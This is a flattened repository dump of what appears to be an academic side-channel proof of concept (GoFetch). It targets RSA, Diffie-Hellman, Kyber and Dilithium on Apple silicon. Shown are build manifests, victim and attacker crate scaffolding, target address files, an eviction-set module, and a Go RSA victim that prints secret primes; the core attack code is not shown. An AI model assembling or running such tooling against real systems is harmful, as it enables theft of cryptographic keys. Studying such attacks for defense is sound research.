Proxy.pm │ │ │ │ ├── Record.pm │ │ │ │ ├── ServerHello.pm │ │ │ │ └── ServerKeyExchange.pm │ │ │ ├── checkhandshake.pm │ │ │ └── with_fallback.pm │ │ │ ├── private.num │ │ │ ├── process_docs.pl │ │ │ ├── shlib_wrap.sh.in │ │ │ ├── su-filter.pl │ │ │ └── unlocal_shlib.com.in │ └── src │ │ └── lib.rs └── openssl-sys-0.9.77 │ ├── .cargo-ok │ ├── .cargo_vcs_info.json │ ├── CHANGELOG.md │ ├── Cargo.toml │ ├── Cargo.toml.orig │ ├── LICENSE-MIT │ ├── README.md │ ├── build │ ├── cfgs.rs │ ├── expando.c │ ├── find_normal.rs │ ├── find_vendored.rs │ ├── main.rs │ └── run_bindgen.rs │ └── src │ ├── aes.rs │ ├── asn1.rs │ ├── bio.rs │ ├── bn.rs │ ├── cms.rs │ ├── crypto.rs │ ├── dtls1.rs │ ├── ec.rs │ ├── err.rs │ ├── evp.rs │ ├── handwritten │ ├── aes.rs │ ├── asn1.rs │ ├── bio.rs │ ├── bn.rs │ ├── cms.rs │ ├── conf.rs │ ├── crypto.rs │ ├── dh.rs │ ├── dsa.rs │ ├── ec.rs │ ├── err.rs │ ├── evp.rs │ ├── hmac.rs │ ├── kdf.rs │ ├── mod.rs │ ├── object.rs │ ├── ocsp.rs │ ├── pem.rs │ ├── pkcs12.rs │ ├── pkcs7.rs │ ├── provider.rs │ ├── rand.rs │ ├── rsa.rs │ ├── safestack.rs │ ├── sha.rs │ ├── srtp.rs │ ├── ssl.rs │ ├── stack.rs │ ├── tls1.rs │ ├── types.rs │ ├── x509.rs │ ├── x509_vfy.rs │ └── x509v3.rs │ ├── lib.rs │ ├── macros.rs │ ├── obj_mac.rs │ ├── ocsp.rs │ ├── pem.rs │ ├── pkcs7.rs │ ├── rsa.rs │ ├── sha.rs │ ├── srtp.rs │ ├── ssl.rs │ ├── ssl3.rs │ ├── tls1.rs │ ├── types.rs │ ├── x509.rs │ ├── x509_vfy.rs │ └── x509v3.rs └── re ├── addrsweep.sh ├── aopstream.sh ├── dmpline.sh ├── history.sh ├── init.sh ├── l2l1fetch.sh ├── nextline.sh ├── noderef.sh ├── src ├── Makefile ├── addr_sweep.c ├── aop_stream.c ├── dmp.h ├── evset_gen.c ├── l2l1_fetch.c ├── lib │ ├── basics │ │ ├── Makefile │ │ ├── allocator.c │ │ ├── allocator.h │ │ ├── arch.h │ │ ├── cache_line_set.c │ │ ├── cache_line_set.h │ │ ├── linked_list.c │ │ ├── linked_list.h │ │ ├── math_utils.c │ │ └── math_utils.h │ └── eviction_set │ │ ├── Makefile │ │ ├── eviction_set.c │ │ ├── eviction_set.h │ │ ├── eviction_set_generation.c │ │ ├── eviction_set_generation.h │ │ ├── sys_utils.c │ │ └── sys_utils.h ├── no_deref.c └── quick_check.c └── tbi.sh /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | 7 | # executed file 8 | *.exe 9 | *.out 10 | 11 | # asmbly 12 | asm/ 13 | !**/openssl-src-111.22.0+1.1.1q/**/asm/ 14 | 15 | # rust target 16 | target/ 17 | 18 | # result 19 | *.txt 20 | data/ 21 | plots/ 22 | 23 | # python cache 24 | __pycache__ 25 | 26 | # Apple cache 27 | .DS_Store 28 | 29 | # Cargo 30 | Cargo.lock 31 | 32 | # target page offset file 33 | !*_addr.txt -------------------------------------------------------------------------------- /linuxsetup/kmod/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += kmod.o 2 | 3 | kmod-y += source/main.o 4 | kmod-y += source/region.o 5 | kmod-y += source/sysregs.o 6 | kmod-y += source/uncore-pmu.o 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | -------------------------------------------------------------------------------- /linuxsetup/pmuctl/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "pmuctl" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | [dependencies] 7 | affinity = "0.1" 8 | thiserror = "1" 9 | -------------------------------------------------------------------------------- /poc/crypto_attacker/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "crypto_attacker" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [features] 9 | kyber = ['libkyber-ffi-sys'] 10 | dh = ['openssl'] 11 | rsa = ['librsa-ffi-sys'] 12 | dilithium = ['libdilithium-ffi-sys'] 13 | 14 | [dependencies] 15 | libaugury-ffi-sys = { path = "../libaugury-ffi-sys" } 16 | libkyber-ffi-sys = { path = "../libkyber-ffi-sys", optional=true } 17 | libdilithium-ffi-sys = { path = "../libdilithium-ffi-sys", optional=true } 18 | librsa-ffi-sys = { path = "../librsa-ffi-sys", optional=true } 19 | openssl = { path = "../openssl-0.10.42", features = ["vendored", "bindgen"], optional=true } 20 | mmap-rs = { git = "https://github.com/StephanvanSchaik/mmap-rs", rev = "793a012" } 21 | evict-rs = { path = "../evict-rs"} 22 | regex = "1.8" 23 | rand = "0.8" 24 | 25 | [profile.release.package.libaugury-ffi-sys] 26 | opt-level = 0 27 | -------------------------------------------------------------------------------- /poc/crypto_attacker/build.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | // set linker flags for kyber 3 | #[cfg(all(feature="kyber", target_os = "macos"))] 4 | println!("cargo:rustc-link-arg=-lcrypto"); 5 | #[cfg(all(feature="kyber", target_os = "macos"))] 6 | println!("cargo:rustc-link-arg=-L/opt/homebrew/opt/openssl@3/lib"); 7 | } -------------------------------------------------------------------------------- /poc/crypto_attacker/ctswap_addr.txt: -------------------------------------------------------------------------------- 1 | 0x0 -------------------------------------------------------------------------------- /poc/crypto_attacker/dh_addr.txt: -------------------------------------------------------------------------------- 1 | 0x13680c240 -------------------------------------------------------------------------------- /poc/crypto_attacker/dh_params.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIIBCAKCAQEAiAy/9z0k5I6964L5PxR6pMm81pb33Z2cq2rF6gfvUdoKtUNRTp1E 3 | PKS9LtoIyaoLNl4sJuGJeupS6A1goHWI5eROxC7X4LxKkfE5jqYK7Zc8TnY7EIlt 4 | sXqF9IG1PPcHA3Yoa5GD5oTZOQ3BnzDv1qsQARClp8g7UvQh32HvW+LibqcrY+iM 5 | G7AfKjqOOd5/PUyne4mGmhvxlEonQGSMlSf8+thvA8KGNHQUKpePeW1nRgpHhtUi 6 | dL5ZZy8nOlr/lhxL+WgXTzs7w6E1DhzL/tfWmcXLoSiVDz7kTmbE3ul5y8C/3kyB 7 | gladj24Ft5Cdd3rOQFJwoG+cWniSJO+guwIBAg== 8 | -----END DH PARAMETERS----- 9 | -------------------------------------------------------------------------------- /poc/crypto_attacker/dilithium_addr.txt: -------------------------------------------------------------------------------- 1 | 0x1400021d420 2 | 0x14000216420 -------------------------------------------------------------------------------- /poc/crypto_attacker/kyber_addr.txt: -------------------------------------------------------------------------------- 1 | 0x2038 -------------------------------------------------------------------------------- /poc/crypto_attacker/rsa_addr.txt: -------------------------------------------------------------------------------- 1 | 0x1400033f970 2 | 0x14000581970 3 | -------------------------------------------------------------------------------- /poc/crypto_attacker/src/lib.rs: -------------------------------------------------------------------------------- 1 | pub const KB: usize = 1024; 2 | pub const MB: usize = 1024 * 1024; 3 | pub const NUM_EVSETS: usize = 64; 4 | pub const CACHE_LINE_SIZE_L2: usize = 128; 5 | pub const CACHE_LINE_SIZE_L1: usize = 64; 6 | pub const L1_CACHE_WAYS: usize = 8; 7 | pub const L2_CACHE_WAYS: usize = 12; 8 | pub const MSB_MASK: u64 = 0x8000000000000000; 9 | pub const NATIVE_PAGE_SIZE: usize = 16 * 1024; 10 | 11 | -------------------------------------------------------------------------------- /poc/crypto_victim/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "crypto_victim" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | 9 | [features] 10 | kyber = ['libkyber-ffi-sys'] 11 | dh = ['openssl'] 12 | rsa = ['librsa-ffi-sys'] 13 | dilithium = ['libdilithium-ffi-sys'] 14 | 15 | 16 | [dependencies] 17 | libaugury-ffi-sys = { path = "../libaugury-ffi-sys" } 18 | libkyber-ffi-sys = { path = "../libkyber-ffi-sys", optional=true } 19 | libdilithium-ffi-sys = { path = "../libdilithium-ffi-sys", optional=true } 20 | librsa-ffi-sys = { path = "../librsa-ffi-sys", optional=true } 21 | openssl = { path = "../openssl-0.10.42", features = ["vendored", "bindgen"], optional=true } 22 | mmap-rs = { git = "https://github.com/StephanvanSchaik/mmap-rs", rev = "793a012" } 23 | rand = "0.8" 24 | 25 | [profile.release.package.libaugury-ffi-sys] 26 | opt-level = 0 -------------------------------------------------------------------------------- /poc/crypto_victim/build.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | // set linker flags for kyber 3 | #[cfg(all(feature="kyber", target_os = "macos"))] 4 | println!("cargo:rustc-link-arg=-lcrypto"); 5 | #[cfg(all(feature="kyber", target_os = "macos"))] 6 | println!("cargo:rustc-link-arg=-L/opt/homebrew/opt/openssl@3/lib"); 7 | } -------------------------------------------------------------------------------- /poc/crypto_victim/dh_params.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN DH PARAMETERS----- 2 | MIIBCAKCAQEAiAy/9z0k5I6964L5PxR6pMm81pb33Z2cq2rF6gfvUdoKtUNRTp1E 3 | PKS9LtoIyaoLNl4sJuGJeupS6A1goHWI5eROxC7X4LxKkfE5jqYK7Zc8TnY7EIlt 4 | sXqF9IG1PPcHA3Yoa5GD5oTZOQ3BnzDv1qsQARClp8g7UvQh32HvW+LibqcrY+iM 5 | G7AfKjqOOd5/PUyne4mGmhvxlEonQGSMlSf8+thvA8KGNHQUKpePeW1nRgpHhtUi 6 | dL5ZZy8nOlr/lhxL+WgXTzs7w6E1DhzL/tfWmcXLoSiVDz7kTmbE3ul5y8C/3kyB 7 | gladj24Ft5Cdd3rOQFJwoG+cWniSJO+guwIBAg== 8 | -----END DH PARAMETERS----- 9 | -------------------------------------------------------------------------------- /poc/crypto_victim/src/lib.rs: -------------------------------------------------------------------------------- 1 | pub const KB: usize = 1024; 2 | pub const MB: usize = 1024 * 1024; 3 | pub const CACHE_LINE_SIZE_L2: usize = 128; 4 | pub const MSB_MASK: u64 = 0x8000000000000000; 5 | #[cfg(target_os = "macos")] 6 | pub const MEMORY_BOUNDARY: u64 = 0x280000000; 7 | #[cfg(target_os = "linux")] 8 | pub const MEMORY_BOUNDARY: u64 = 0xffff00000000; 9 | pub const PRNG_M: u64 = 8388617; 10 | 11 | pub fn print_size(bytes: usize) { 12 | if bytes <= KB { 13 | print!("{}B", bytes); 14 | } else if bytes <= MB { 15 | print!("{}KB", bytes/KB); 16 | } else { 17 | print!("{}MB", bytes/MB); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /poc/dilithium_data/collection.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | num_message=$1; shift 3 | num_process=$1; shift 4 | 5 | bucket=$((num_message / num_process)) 6 | echo "Num of Message: $num_message" 7 | echo "Num of process: $num_process" 8 | echo "Num of message per process: $bucket" 9 | 10 | for ((process_idx = 0; process_idx < num_process; process_idx++)); do 11 | echo "process_idx $process_idx start" 12 | rm -f col_${process_idx}.txt 13 | go test -bench BenchmarkSign_Attack -benchtime=${bucket}x -timeout 24h > col_${process_idx}.txt & 14 | sleep 1s 15 | done 16 | wait 17 | rm -f col_all.txt 18 | touch col_all.txt 19 | for ((process_idx = 0; process_idx < num_process; process_idx++)); do 20 | cat col_${process_idx}.txt >> col_all.txt 21 | done 22 | echo "Collection Finish" 23 | -------------------------------------------------------------------------------- /poc/evict-rs/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "evict-rs" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | [features] 7 | 8 | [dependencies] 9 | intrusive-collections = "0.9" 10 | rand = "0.8" 11 | mmap-rs = { git = "https://github.com/StephanvanSchaik/mmap-rs", rev = "793a012" } 12 | libc = "0.2" 13 | env_logger = "0.9" 14 | log = "0.4" -------------------------------------------------------------------------------- /poc/evict-rs/src/cache_line.rs: -------------------------------------------------------------------------------- 1 | //! The cache line is the smallest unit of granularity at which cache attacks 2 | //! operate. This module provides an abstraction [`CacheLine`] that can be used 3 | //! to temporarily link cache lines together to form an eviction set that can be 4 | //! accessed through traversing the linked list. 5 | use intrusive_collections::LinkedListLink; 6 | use intrusive_collections::intrusive_adapter; 7 | 8 | /// The cache line is the smallest unit of granularity at which cache attacks 9 | /// operate. 10 | pub struct CacheLine { 11 | /// This link is a node in a doubly-linked list. It used to temporarily 12 | /// link together multiple cache lines to form an eviction set, where 13 | /// traversing the linked list results in access pattern that can evict 14 | /// other cache lines from the cache. 15 | pub link: LinkedListLink, 16 | } 17 | 18 | intrusive_adapter!(pub CacheLineAdapter<'a> = &'a CacheLine: CacheLine { link: LinkedListLink }); 19 | -------------------------------------------------------------------------------- /poc/evict-rs/src/timer.rs: -------------------------------------------------------------------------------- 1 | pub trait Timer { 2 | fn new() -> Self; 3 | fn time(&self, f: F) -> u64; 4 | fn time_load(&self, victim: *mut u8) -> u64; 5 | } 6 | -------------------------------------------------------------------------------- /poc/libaugury-ffi-sys/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "libaugury-ffi-sys" 3 | version = "0.1.0" 4 | edition = "2021" 5 | links = "augury-ffi" 6 | build = "build.rs" 7 | 8 | [dependencies] 9 | 10 | [build-dependencies] 11 | cc = "1.0" 12 | 13 | [profile.release] 14 | opt-level = 0 15 | -------------------------------------------------------------------------------- /poc/libaugury-ffi-sys/build.rs: -------------------------------------------------------------------------------- 1 | use cc; 2 | 3 | fn main() { 4 | let src = [ 5 | "src/c_augury.c" 6 | ]; 7 | 8 | let mut builder = cc::Build::new(); 9 | let build = builder 10 | .files(src.iter()) 11 | .include("src") 12 | .static_flag(true) 13 | .target("aarch64-apple-darwin"); 14 | 15 | build.compile("augury-ffi"); 16 | } 17 | -------------------------------------------------------------------------------- /poc/libaugury-ffi-sys/src/c_augury.h: -------------------------------------------------------------------------------- 1 | #ifndef _C_AUGURY_H 2 | #define _C_AUGURY_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | 9 | void constant_time_cond_swap_64(uint64_t mask, uint64_t *a, 10 | uint64_t *b); 11 | 12 | void pin_cpu(size_t core_ID); 13 | 14 | uint64_t c_sleep(uint64_t duration, uint64_t __trash); 15 | 16 | uint64_t c_thrash_cache(uint64_t* thrash_addr, \ 17 | uint32_t size_of_thrash_array, uint64_t __trash); 18 | 19 | uint64_t flush_evset(uint64_t* evset_start, uint32_t num_of_ptrs); 20 | 21 | #endif // _C_AUGURY_H -------------------------------------------------------------------------------- /poc/libaugury-ffi-sys/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![allow(non_upper_case_globals)] 2 | #![allow(non_camel_case_types)] 3 | #![allow(non_snake_case)] 4 | 5 | include!("./bindings.rs"); 6 | -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "libdilithium-ffi-sys" 3 | version = "0.1.0" 4 | edition = "2021" 5 | build = "build.rs" 6 | links = "./src/libdilithium.a" 7 | 8 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 9 | 10 | [dependencies] 11 | -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/build.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | let path = "./src"; 3 | let lib = "dilithium"; 4 | 5 | println!("cargo:rustc-link-search=native={}", path); 6 | println!("cargo:rustc-link-lib=static={}", lib); 7 | } -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/src/ffi.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # build dilithium library 3 | go build -buildmode=c-archive -o libdilithium.a dilithium.go 4 | # translate header file 5 | bindgen libdilithium.h -o bindings.rs -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/src/go.mod: -------------------------------------------------------------------------------- 1 | module dilithium 2 | 3 | go 1.20 4 | 5 | require ( 6 | github.com/cloudflare/circl v1.3.3 // indirect 7 | golang.org/x/sys v0.3.0 // indirect 8 | ) 9 | -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/src/go.sum: -------------------------------------------------------------------------------- 1 | github.com/cloudflare/circl v1.3.3 h1:fE/Qz0QdIGqeWfnwq0RE0R7MI51s0M2E4Ga9kq5AEMs= 2 | github.com/cloudflare/circl v1.3.3/go.mod h1:5XYMA4rFBvNIrhs50XuiBJ15vF2pZn4nnUKZrLbUZFA= 3 | golang.org/x/sys v0.3.0 h1:w8ZOecv6NaNa/zC8944JTU3vz4u6Lagfk4RPQxv92NQ= 4 | golang.org/x/sys v0.3.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 5 | -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![allow(non_upper_case_globals)] 2 | #![allow(non_camel_case_types)] 3 | #![allow(non_snake_case)] 4 | 5 | include!("./bindings.rs"); 6 | -------------------------------------------------------------------------------- /poc/libdilithium-ffi-sys/src/libdilithium.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/libdilithium-ffi-sys/src/libdilithium.a -------------------------------------------------------------------------------- /poc/libkyber-ffi-sys/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "libkyber-ffi-sys" 3 | version = "0.1.0" 4 | edition = "2021" 5 | links = "kyber-ffi" 6 | build = "build.rs" 7 | 8 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 9 | 10 | [dependencies] 11 | 12 | [build-dependencies] 13 | cc = "1.0" 14 | 15 | [profile.release] 16 | opt-level = 3 17 | 18 | -------------------------------------------------------------------------------- /poc/libkyber-ffi-sys/src/cbd.h: -------------------------------------------------------------------------------- 1 | #ifndef CBD_H 2 | #define CBD_H 3 | 4 | #include 5 | #include "params.h" 6 | #include "poly.h" 7 | 8 | #define cbd_eta1 KYBER_NAMESPACE(_cbd_eta1) 9 | void cbd_eta1(poly *r, const uint8_t buf[KYBER_ETA1*KYBER_N/4]); 10 | 11 | #define cbd_eta2 KYBER_NAMESPACE(_cbd_eta2) 12 | void cbd_eta2(poly *r, const uint8_t buf[KYBER_ETA2*KYBER_N/4]); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /poc/libkyber-ffi-sys/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![allow(non_upper_case_globals)] 2 | #![allow(non_camel_case_types)] 3 | #![allow(non_snake_case)] 4 | 5 | include!("./bindings.rs"); 6 | 7 | -------------------------------------------------------------------------------- /poc/libkyber-ffi-sys/src/ntt.h: -------------------------------------------------------------------------------- 1 | #ifndef NTT_H 2 | #define NTT_H 3 | 4 | #include 5 | #include "params.h" 6 | 7 | #define zetas KYBER_NAMESPACE(_zetas) 8 | extern const int16_t zetas[128]; 9 | 10 | #define zetas_inv KYBER_NAMESPACE(_zetas_inv) 11 | extern const int16_t zetas_inv[128]; 12 | 13 | #define ntt KYBER_NAMESPACE(_ntt) 14 | void ntt(int16_t poly[256]); 15 | 16 | #define invntt KYBER_NAMESPACE(_invntt) 17 | void invntt(int16_t poly[256]); 18 | 19 | #define basemul KYBER_NAMESPACE(_basemul) 20 | void basemul(int16_t r[2], 21 | const int16_t a[2], 22 | const int16_t b[2], 23 | int16_t zeta); 24 | 25 | #endif 26 | -------------------------------------------------------------------------------- /poc/libkyber-ffi-sys/src/reduce.h: -------------------------------------------------------------------------------- 1 | #ifndef REDUCE_H 2 | #define REDUCE_H 3 | 4 | #include 5 | #include "params.h" 6 | 7 | #define MONT 2285 // 2^16 mod q 8 | #define QINV 62209 // q^-1 mod 2^16 9 | 10 | #define montgomery_reduce KYBER_NAMESPACE(_montgomery_reduce) 11 | int16_t montgomery_reduce(int32_t a); 12 | 13 | #define barrett_reduce KYBER_NAMESPACE(_barrett_reduce) 14 | int16_t barrett_reduce(int16_t a); 15 | 16 | #define csubq KYBER_NAMESPACE(_csubq) 17 | int16_t csubq(int16_t x); 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /poc/libkyber-ffi-sys/src/verify.h: -------------------------------------------------------------------------------- 1 | #ifndef VERIFY_H 2 | #define VERIFY_H 3 | 4 | #include 5 | #include 6 | #include "params.h" 7 | 8 | #define verify KYBER_NAMESPACE(_verify) 9 | int verify(const uint8_t *a, const uint8_t *b, size_t len); 10 | 11 | #define cmov KYBER_NAMESPACE(_cmov) 12 | void cmov(uint8_t *r, const uint8_t *x, size_t len, uint8_t b); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "librsa-ffi-sys" 3 | version = "0.1.0" 4 | edition = "2021" 5 | build = "build.rs" 6 | links = "./src/librsa.a" 7 | 8 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 9 | 10 | [dependencies] 11 | -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/build.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | let path = "./src"; 3 | let lib = "rsa"; 4 | 5 | println!("cargo:rustc-link-search=native={}", path); 6 | println!("cargo:rustc-link-lib=static={}", lib); 7 | } -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/src/ffi.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # build rsa library 3 | go build -buildmode=c-archive -o librsa.a rsa.go 4 | # translate header file 5 | bindgen librsa.h -o bindings.rs -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/src/go.mod: -------------------------------------------------------------------------------- 1 | module rsa 2 | 3 | go 1.20 4 | -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![allow(non_upper_case_globals)] 2 | #![allow(non_camel_case_types)] 3 | #![allow(non_snake_case)] 4 | 5 | include!("./bindings.rs"); 6 | -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/src/librsa.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FPSG-UIUC/GoFetch/13e2533b930f1ece5f0cee4969c0f0f184f65854/poc/librsa-ffi-sys/src/librsa.a -------------------------------------------------------------------------------- /poc/librsa-ffi-sys/src/rsa.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "C" 4 | import ( 5 | "crypto/rand" 6 | "crypto/rsa" 7 | "crypto/sha256" 8 | ) 9 | 10 | // Global variable 11 | var privateKey *rsa.PrivateKey 12 | var publicKey *rsa.PublicKey 13 | 14 | //export Init 15 | func Init(num_bits int) int { 16 | // The GenerateKey method takes in a reader that returns random bits, and 17 | // the number of bits 18 | privateKey_temp, err := rsa.GenerateKey(rand.Reader, num_bits) 19 | if err != nil { 20 | return 1 21 | } 22 | privateKey = privateKey_temp 23 | publicKey = &privateKey_temp.PublicKey 24 | 25 | return 0 26 | } 27 | 28 | //export Display_PQ 29 | func Display_PQ() { 30 | privateKey.Dump_PQ() 31 | } 32 | 33 | //export Victim 34 | func Victim(CTBytes []byte) uint { 35 | _, err := rsa.DecryptOAEP(sha256.New(), nil, privateKey, CTBytes, rsa.OAEPOptions{}.Label) 36 | if err != nil { 37 | return 0 38 | } else { 39 | return 1 40 | } 41 | } 42 | 43 | func main() { 44 | 45 | } 46 | -------------------------------------------------------------------------------- /poc/lwe_with_hints/__init__.py: -------------------------------------------------------------------------------- 1 | from lwe_with_hints.lwe_gen import module 2 | from lwe_with_hints.lwe_lattice import LWELattice -------------------------------------------------------------------------------- /poc/openssl-0.10.42/.cargo-ok: -------------------------------------------------------------------------------- 1 | ok -------------------------------------------------------------------------------- /poc/openssl-0.10.42/.cargo_vcs_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "git": { 3 | "sha1": "e43eb58540b27a17f8029c397e3edc12bbc9011f" 4 | }, 5 | "path_in_vcs": "openssl" 6 | } -------------------------------------------------------------------------------- /poc/openssl-0.10.42/Cargo.toml.orig: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "openssl" 3 | version = "0.10.42" 4 | authors = ["Steven Fackler "] 5 | license = "Apache-2.0" 6 | description = "OpenSSL bindings" 7 | repository = "https://github.com/sfackler/rust-openssl" 8 | readme = "README.md" 9 | keywords = ["crypto", "tls", "ssl", "dtls"] 10 | categories = ["cryptography", "api-bindings"] 11 | edition = "2018" 12 | 13 | # these are deprecated and don't do anything anymore 14 | [features] 15 | v101 = [] 16 | v102 = [] 17 | v110 = [] 18 | v111 = [] 19 | 20 | vendored = ['ffi/vendored'] 21 | bindgen = ['ffi/bindgen'] 22 | unstable_boringssl = ["ffi/unstable_boringssl"] 23 | default = [] 24 | 25 | [dependencies] 26 | bitflags = "1.0" 27 | cfg-if = "1.0" 28 | foreign-types = "0.3.1" 29 | libc = "0.2" 30 | once_cell = "1.5.2" 31 | 32 | openssl-macros = { version = "0.1.0", path = "../openssl-macros" } 33 | ffi = { package = "openssl-sys", version = "0.9.76", path = "../openssl-sys" } 34 | 35 | [dev-dependencies] 36 | hex = "0.3" 37 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2011-2017 Google Inc. 2 | 2013 Jack Lloyd 3 | 2013-2014 Steven Fackler 4 | 5 | Licensed under the Apache License, Version 2.0 (the "License"); 6 | you may not use this file except in compliance with the License. 7 | You may obtain a copy of the License at 8 | 9 | http://www.apache.org/licenses/LICENSE-2.0 10 | 11 | Unless required by applicable law or agreed to in writing, software 12 | distributed under the License is distributed on an "AS IS" BASIS, 13 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | See the License for the specific language governing permissions and 15 | limitations under the License. 16 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/README.md: -------------------------------------------------------------------------------- 1 | # rust-openssl 2 | 3 | [![crates.io](https://img.shields.io/crates/v/openssl.svg)](https://crates.io/crates/openssl) 4 | 5 | OpenSSL bindings for the Rust programming language. 6 | 7 | [Documentation](https://docs.rs/openssl). 8 | 9 | ## Release Support 10 | 11 | The current supported release of `openssl` is 0.10 and `openssl-sys` is 0.9. 12 | 13 | New major versions will be published at most once per year. After a new 14 | release, the previous major version will be partially supported with bug 15 | fixes for 3 months, after which support will be dropped entirely. 16 | 17 | ### Contribution 18 | 19 | Unless you explicitly state otherwise, any contribution intentionally 20 | submitted for inclusion in the work by you, as defined in the Apache-2.0 21 | license, shall be dual licensed under the terms of both the Apache License, 22 | Version 2.0 and the MIT license without any additional terms or conditions. 23 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/src/ex_data.rs: -------------------------------------------------------------------------------- 1 | use libc::c_int; 2 | use std::marker::PhantomData; 3 | 4 | /// A slot in a type's "extra data" structure. 5 | /// 6 | /// It is parameterized over the type containing the extra data as well as the 7 | /// type of the data in the slot. 8 | pub struct Index(c_int, PhantomData<(T, U)>); 9 | 10 | impl Copy for Index {} 11 | 12 | impl Clone for Index { 13 | fn clone(&self) -> Index { 14 | *self 15 | } 16 | } 17 | 18 | impl Index { 19 | /// Creates an `Index` from a raw integer index. 20 | /// 21 | /// # Safety 22 | /// 23 | /// The caller must ensure that the index correctly maps to a `U` value stored in a `T`. 24 | pub unsafe fn from_raw(idx: c_int) -> Index { 25 | Index(idx, PhantomData) 26 | } 27 | 28 | #[allow(clippy::trivially_copy_pass_by_ref)] 29 | pub fn as_raw(&self) -> c_int { 30 | self.0 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/src/fips.rs: -------------------------------------------------------------------------------- 1 | //! FIPS 140-2 support. 2 | //! 3 | //! See [OpenSSL's documentation] for details. 4 | //! 5 | //! [OpenSSL's documentation]: https://www.openssl.org/docs/fips/UserGuide-2.0.pdf 6 | use crate::cvt; 7 | use crate::error::ErrorStack; 8 | use openssl_macros::corresponds; 9 | 10 | /// Moves the library into or out of the FIPS 140-2 mode of operation. 11 | #[corresponds(FIPS_mode_set)] 12 | pub fn enable(enabled: bool) -> Result<(), ErrorStack> { 13 | ffi::init(); 14 | unsafe { cvt(ffi::FIPS_mode_set(enabled as _)).map(|_| ()) } 15 | } 16 | 17 | /// Determines if the library is running in the FIPS 140-2 mode of operation. 18 | #[corresponds(FIPS_mode)] 19 | pub fn enabled() -> bool { 20 | unsafe { ffi::FIPS_mode() != 0 } 21 | } 22 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/src/lib_ctx.rs: -------------------------------------------------------------------------------- 1 | use crate::cvt_p; 2 | use crate::error::ErrorStack; 3 | use foreign_types::ForeignType; 4 | use openssl_macros::corresponds; 5 | 6 | foreign_type_and_impl_send_sync! { 7 | type CType = ffi::OSSL_LIB_CTX; 8 | fn drop = ffi::OSSL_LIB_CTX_free; 9 | 10 | pub struct LibCtx; 11 | pub struct LibCtxRef; 12 | } 13 | 14 | impl LibCtx { 15 | #[corresponds(OSSL_LIB_CTX_new)] 16 | pub fn new() -> Result { 17 | unsafe { 18 | let ptr = cvt_p(ffi::OSSL_LIB_CTX_new())?; 19 | Ok(LibCtx::from_ptr(ptr)) 20 | } 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /poc/openssl-0.10.42/test/cms.p12: 